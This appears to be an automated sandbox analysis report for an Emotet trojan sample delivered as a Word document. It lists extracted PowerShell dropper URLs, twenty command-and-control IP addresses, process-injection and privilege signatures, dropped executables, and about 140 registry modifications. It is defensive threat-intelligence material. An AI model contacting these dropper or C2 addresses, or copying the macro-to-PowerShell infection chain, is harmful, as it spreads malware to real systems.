emotet | e8f4adbc33575dfdc6cc8046ec0478baee34237bda285c3e9fd4798aea4ea516

Analysis

max time kernel
135s
resource
win7v191014
submitted
20/12/2019, 03:54

Sharing

Copy URL

Twitter E-mail

General

Target

Docs_8a1b1714e1ae0fabcf590df96af964ab.27
Sample

191220-2lrnvyq9je
SHA256

e8f4adbc33575dfdc6cc8046ec0478baee34237bda285c3e9fd4798aea4ea516

Score

10^/10

trojan banker emotet

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://fanitv.com/sandbox/oQmLZD/

exe.dropper

http://bicheru-cycling.ro/bbr/IEScmzh/

exe.dropper

http://lesdebatsdecouzon.org/lddc/7wpe2-kckbz4za-25568/

exe.dropper

https://4vetcbd.com/cgi-bin/CqCjQxYqx/

exe.dropper

http://zlatebenz.mk/wp-content/6nlkz6y-lmfk-9136296721/

Extracted

Family

emotet

98.178.241.106:80

190.171.153.139:80

179.5.118.12:8080

45.79.75.232:8080

124.150.175.133:80

164.68.115.146:8080

5.189.148.98:8080

46.105.128.215:8080

67.254.196.78:443

95.216.207.86:7080

181.46.176.38:80

98.15.140.226:80

217.12.70.226:80

115.179.91.58:80

41.190.148.90:80

162.144.46.90:8080

211.218.105.101:80

212.129.14.27:8080

120.51.83.89:443

200.41.121.69:443

rsa_pubkey.plain

Signatures

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1040	WINWORD.EXE

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
1040	WINWORD.EXE
2000	WISPTIS.EXE
1940	WISPTIS.EXE
2160	662.exe
2188	662.exe
2248	makercors.exe
2268	makercors.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
1040	WINWORD.EXE

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 732 wrote to memory of 2160	732	Powershell.exe	33
PID 2160 wrote to memory of 2188	2160	662.exe	34
PID 2248 wrote to memory of 2268	2248	makercors.exe	36

Suspicious behavior: EmotetMutantsSpam 2 IoCs

pid	Process
2188	662.exe
2268	makercors.exe

Drops file in System32 directory 6 IoCs

description	ioc	Process
File deleted	C:\Windows\System32\spool\drivers\x64\3\mxdwdui.BUD	WINWORD.EXE
File created	C:\Windows\system32\spool\DRIVERS\x64\3\mxdwdui.BUD	WINWORD.EXE
File opened for modification	C:\Windows\system32\GDIPFONTCACHEV1.DAT	WINWORD.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	Powershell.exe
File renamed	C:\Users\Admin\662.exe => C:\Windows\SysWOW64\makercors.exe	662.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	makercors.exe

Process spawned unexpected child process 1 IoCs

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	732	944	Powershell.exe	28

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	732	Powershell.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
732	Powershell.exe
2268	makercors.exe

Executes dropped EXE 4 IoCs

pid	Process
2160	662.exe
2188	662.exe
2248	makercors.exe
2268	makercors.exe

Modifies registry class 144 IoCs

description	ioc
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}\ = "MdcComboEvents"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}\ = "IPage"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}\ = "WHTMLControlEvents"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents1"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}\ = "MdcListEvents"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents9"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}\ = "Tab"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLOption"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}\ = "IReturnString"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}\ = "LabelControlEvents"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}\ = "MdcCheckBoxEvents"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}\ = "ImageEvents"
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{7078A2CF-40F7-4C17-A0B9-8445BD7D22F5}\2.0\FLAGS\ = "6"
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{7078A2CF-40F7-4C17-A0B9-8445BD7D22F5}\2.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Word8.0\\MSForms.exd"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents2"
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5BB0FAC6-657A-4E8A-9348-2ED15190A268}\1.0\HELPDIR\ = "C:\\Users\\Admin\\Application Data\\Microsoft\\Forms"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7"
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{39395364-7588-456F-9C33-C57477C7DA9A}\1.0\ = "Microsoft InkEdit Control 1.0"
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{39395364-7588-456F-9C33-C57477C7DA9A}\1.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE"
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5BB0FAC6-657A-4E8A-9348-2ED15190A268}\1.0\FLAGS\ = "4"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCheckBox"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLCheckbox"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}\ = "Tab"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}\ = "MdcTextEvents"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLImage"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}\ = "_UserForm"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}\ = "LabelControlEvents"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}\ = "IMultiPage"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents2"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}\ = "OptionFrameEvents"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCombo"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}\ = "IScrollbar"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}\ = "TabStripEvents"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}\ = "Pages"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}\ = "FormEvents"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLPassword"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}\ = "CommandButtonEvents"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}\ = "MdcToggleButtonEvents"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLTextArea"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents6"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents10"
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{7078A2CF-40F7-4C17-A0B9-8445BD7D22F5}\2.0\ = "Microsoft Forms 2.0 Object Library"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\TypeLib\{7078A2CF-40F7-4C17-A0B9-8445BD7D22F5}\2.0\FLAGS\ = "6"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLOption"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}\ = "MdcToggleButtonEvents"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents1"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents10"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}\ = "SpinbuttonEvents"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcText"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCombo"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}\ = "MdcOptionButtonEvents"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}\ = "MdcOptionButtonEvents"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcToggleButton"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}\ = "IScrollbar"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\TypeLib\{7078A2CF-40F7-4C17-A0B9-8445BD7D22F5}\2.0\ = "Microsoft Forms 2.0 Object Library"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\TypeLib\{7078A2CF-40F7-4C17-A0B9-8445BD7D22F5}\2.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Word8.0\\MSForms.exd"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}\ = "TabStripEvents"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\TypeLib\{7078A2CF-40F7-4C17-A0B9-8445BD7D22F5}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Word8.0"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}\ = "MultiPageEvents"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}\ = "ITabStrip"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLText"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLHidden"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}\ = "IPage"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents5"
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{7078A2CF-40F7-4C17-A0B9-8445BD7D22F5}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Word8.0"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}\ = "_UserForm"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}\ = "ILabelControl"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcOptionButton"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSelect"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}\ = "MdcTextEvents"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}\ = "MultiPageEvents"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}\ = "FormEvents"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}\ = "ILabelControl"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}\ = "ImageEvents"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents3"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}\ = "ControlEvents"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcOptionButton"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}\ = "WHTMLControlEvents"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcToggleButton"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}\ = "SpinbuttonEvents"
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{39395364-7588-456F-9C33-C57477C7DA9A}\1.0\FLAGS\ = "4"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}\ = "ICommandButton"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcText"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCheckBox"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents6"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}\ = "IReturnString"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}\ = "OptionFrameEvents"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLTextArea"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLImage"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLCheckbox"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSelect"
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{39395364-7588-456F-9C33-C57477C7DA9A}\1.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE\\INKEDLib.exd"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents9"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}\ = "Controls"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}\ = "Controls"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}\ = "Tabs"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}\ = "Pages"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}\ = "IMultiPage"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLHidden"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}\ = "MdcCheckBoxEvents"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents3"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}\ = "ControlEvents"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents5"
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5BB0FAC6-657A-4E8A-9348-2ED15190A268}\1.0\ = "Microsoft InkEdit Control 1.0"
Set value (str)	\REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLPassword"
